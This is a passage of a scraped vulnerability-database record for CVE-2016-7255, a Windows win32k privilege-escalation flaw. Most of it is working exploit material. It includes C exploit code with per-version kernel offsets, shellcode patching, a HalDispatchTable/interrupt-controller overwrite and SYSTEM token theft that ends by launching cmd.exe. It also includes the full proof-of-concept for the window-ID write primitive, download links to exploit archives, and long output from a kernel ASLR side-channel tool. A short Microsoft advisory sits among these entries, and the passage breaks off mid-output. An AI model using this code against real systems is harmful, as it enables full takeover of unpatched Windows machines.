_KPROCESS\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \n }\n\telse if(osversion == 81)\n {\n // the target machine's OS is Windows 8.1\n printf(\" [+] Windows 8.1\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 10)\n {\n // the target machine's OS is Windows 10 prior to build 14393\n printf(\" [+] Windows 10\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 12)\n {\n // the target machine's OS is Windows 2012 R2\n printf(\" [+] Windows 2012 R2\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : 
_LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n // in case the OS version is not any of the previously checked versions\n else\n {\n printf(\" [-] Unsupported version\\n\");\n printf(\" [*] Affected 64-bit operating systems\\n\");\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\n return -1;\n }\n \n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\n GetUserName(pre_username, &size);\n\tprintf(\"Current Username: %s\\n\", pre_username);\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\n\tprintf(\"Enter to continue...\\n\");\n\tgetchar();\n\n\tdo\n\t{\n\t\tor_address_value_4((void*)PML4_SELF_REF);\n\t} while (FALSE);\n\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\n\t\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\n\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\n\tDWORD pid = GetCurrentProcessId();\n \n /* Shellcode Patching !! 
*/\n\tchar *p = shellcode;\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\n\n\tp += 12; // Patch shellcode with original value in the Overwrite address\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\n\n\tp += 12; // To patch the PID of our process\n\t\n\t*(DWORD *)p = (DWORD)pid;\n \n p += 17;\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\n \n p += 7;\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n UINT64 shellcode_va = store_shellcode_in_hal();\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\n\t\n\tif (osversion == 7){\n\t\t// Exploit Win7.1\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\n\n\t\tif (!hNtDll) {\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\n\n\t\tif (!NtQueryIntervalProfile) {\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\t\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\n\t}\n\n\t\n\twhile (1) {\n\t\tsize = 256;\n\t\tGetUserName(post_username, &size);\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\n\t}\n\tSleep(2000);\n\tsystem(\"cmd.exe\");\n\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k Denial of Service (MS16-135)", "edition": 1, "published": "2016-11-09T00:00:00", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0075", "CVE-2016-7255"], 
"modified": "2016-11-09T00:00:00", "id": "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "href": "", "sourceData": "/*\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\nFull Proof of Concept:\n\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\n\n********************************************************************\n Created:\t2016-11-09 14:23:09\n Filename: \tmain.c\n Author:\troot[at]TinySec.net\n Version\t0.0.0.1\n Purpose:\tpoc of cve-2016-0075\n*********************************************************************\n*/\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n\n//////////////////////////////////////////////////////////////////////////\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n\n#undef DbgPrint\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList=NULL;\n\tULONG ulRet = 0;\n\t\n\tdo \n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\n\t\t\n\t\tva_start(VaList,Format);\n\t\t\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\n\t\t\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\n\t\tOutputDebugStringA(pszDbgBuff);\n\t\t\n\t\tva_end(VaList);\n\t\t\n\t} while (FALSE);\n\t\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\n\t\tpszDbgBuff = NULL;\n\t}\n\t\n\treturn ulRet;\n}\n\n\n int _sim_key_down(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = 0;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int 
_sim_key_up(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_alt_shift_esc()\n {\n\t int i = 0;\n\t \n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\t\t \n\t\t\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\t\t\t \n\t\t _sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \t \n\t\t \n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n \n\n int _sim_alt_shift_tab(int nCount)\n {\n\t int i = 0;\n\t HWND hWnd = NULL;\n\n\n\t int nFinalRet = -1;\n\n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\n\n\t\t for ( i = 0; i < nCount ; i++)\n\t\t {\n\t\t\t _sim_key_down( VK_TAB);\n\t\t\t _sim_key_up( VK_TAB);\n\t\t\t \n\t\t\t Sleep(1000);\n\n\t\t }\n\t\n\t\t \n\t\t_sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \n\t } while (FALSE);\n\t \n\t return nFinalRet;\n}\n\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = {0};\n\n\tHWND\thWndParent = NULL;\n\tHWND\thWndChild = NULL;\n\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\n\n\tvoid*\tpId = NULL;\n\tMSG\t\tstMsg = {0};\n\n\tdo \n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\t\t\n\t\tif ( 0 == RegisterClassExW(&stWC) )\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = 
CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\t\t\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\t#ifdef _WIN64\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \n\t\t#else\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \n\t\t#endif // #ifdef _WIN64\n\t\t\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\n\t\tDebugBreak();\n\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild , GetDesktopWindow() );\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\t\t\n\t\tSwitchToThisWindow(hWndChild , TRUE);\n\t\t\n\t\t_sim_alt_shift_esc();\n\n\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\n\t\t{\t\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t}\n\t\n\n\t} while (FALSE);\n\n\tif ( NULL != hWndParent )\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif ( NULL != hWndChild )\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\n\n\treturn 0;\n}\n\nint __cdecl wmain(int nArgc, WCHAR** Argv)\n{\n\tdo \n\t{\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\n\t} while (FALSE);\n\t\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - Win32k Local Privilege Escalation", "edition": 1, "published": "2019-05-15T00:00:00", "title": "Microsoft Windows - Win32k Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0803", "CVE-2016-7255"], "modified": "2019-05-15T00:00:00", "id": "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "href": "", "sourceData": "# CVE-2019-0803\nWin32k Elevation of Privilege 
Poc\n\nReference\n-----------------------------\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\n\n\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7255"], "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7255", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255", "published": "2016-12-13T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-18T17:25:55", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26414", "id": "1337DAY-ID-26414", "sourceData": "Complete Proof of 
Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n \r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n \r\nRequirements\r\n \r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n \r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n \r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! 
- Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! 
- Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! 
- Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! 
- Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n \r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent 
yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! 
- Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! 
- Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for 